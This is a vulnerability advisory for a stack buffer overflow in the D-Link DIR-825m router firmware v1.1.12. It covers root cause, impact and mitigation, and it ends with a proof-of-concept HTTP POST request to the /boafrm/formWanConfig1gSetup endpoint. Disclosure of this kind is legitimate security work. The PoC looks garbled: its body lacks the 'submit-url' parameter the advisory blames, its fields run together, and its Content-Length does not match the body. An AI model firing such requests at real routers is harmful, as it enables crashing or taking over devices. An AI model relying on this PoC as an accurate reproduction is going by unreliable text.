# D-Link DIR-825m v1.1.12 Buffer Overflow Vulnerability Summary ## Vulnerability Overview * **Vulnerability Name**: Buffer Overflow in /boafrm/formWanConfig1gSetup * **Vulnerability Type**: Buffer Overflow * **Affected Product**: D-Link DIR-825m * **Affected Version**: Firmware v1.1.12 * **Vulnerability Location**: `/boafrm/formWanConfig1gSetup` endpoint * **Root Cause**: In the `sub_4148A8` function, the program uses the `strcpy` function to parse the `submit-url` parameter from the request. Due to a lack of boundary checks, an attacker can provide an oversized `submit-url` parameter to overwrite the program stack, resulting in a stack buffer overflow. ## Impact Scope * **Denial of Service (DoS)**: Crashes the web server process, making the device management interface inaccessible. * **Remote Code Execution (RCE)**: By overwriting the return address on the stack to redirect the program execution flow, an attacker may gain full control over the device. * **Network Attacks**: Upon successful exploitation, an attacker can take over the router to monitor network traffic or use it as a pivot to attack other devices within the network. ## Remediation * **Recommendation**: Upgrade the firmware to the latest version (the vendor has not provided a specific patched version; it is recommended to contact the vendor for updates). * **Temporary Mitigation**: If possible, restrict access to the management interface or filter the length of the `submit-url` parameter in incoming requests. ## Proof of Concept (PoC) ```http POST /boafrm/formWanConfig1gSetup HTTP/1.1 Host: 192.168.0.1 Content-Length: 319 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Origin: http://192.168.0.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36 Accept-Language: zh-CN,zh;q=0.9 Accept-Encoding: gzip, deflate, br Cookie: webuiCookie=eb0d9vqZbgYfEt2zJd80n Connection: keep-alive wanIndex=0&wanName=wanType=0&wanIp=wan_mask=wan_gateway=static1=ip4c110n5=4d51=4d5=24ddcpMTU512e=1500 ```